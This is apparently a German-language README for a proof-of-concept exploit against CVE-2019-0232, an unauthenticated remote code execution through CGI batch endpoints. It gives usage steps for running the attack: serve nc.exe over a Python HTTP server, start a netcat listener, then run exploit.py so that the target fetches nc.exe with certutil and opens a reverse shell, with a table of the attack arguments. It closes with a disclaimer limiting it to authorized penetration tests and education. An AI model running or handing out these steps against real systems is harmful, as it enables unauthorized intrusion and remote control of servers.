
Exploit basierend auf /jaiguptanick/CVE-2019-0232
PoC für nicht authentifizierte RCE über CGI-Batch-Endpunkte. Lädt nc.exe mit certutil auf das Ziel herunter und löst eine Reverse Shell aus.
1. nc.exe bereitstellen (im selben Verzeichnis, in dem sich nc.exe befindet):
python3 -m http.server 80
2. Starte deinen Listener:
nc -lvnp 1234
3. Führe den Exploit aus:
python3 exploit.py \
--url http://:/cgi/.bat \
--server-ip \
--server-port 80 \
--nc-ip \
--nc-port 1234
| Argument | Erforderlich | Standard | Beschreibung |
|---|---|---|---|
--url | ✅ | — | Vollständige Ziel-URL mit CGI-Endpunkt |
--server-ip | ✅ | — | Deine IP, die nc.exe über HTTP bereitstellt |
--server-port | ❌ | 80 | Port für den HTTP-Server |
--nc-ip | ✅ | — | IP-Adresse deines Netcat-Listeners |
--nc-port | ✅ | — | Port deines Netcat-Listeners |
Nur für autorisierte Penetrationstests und zu Bildungszwecken.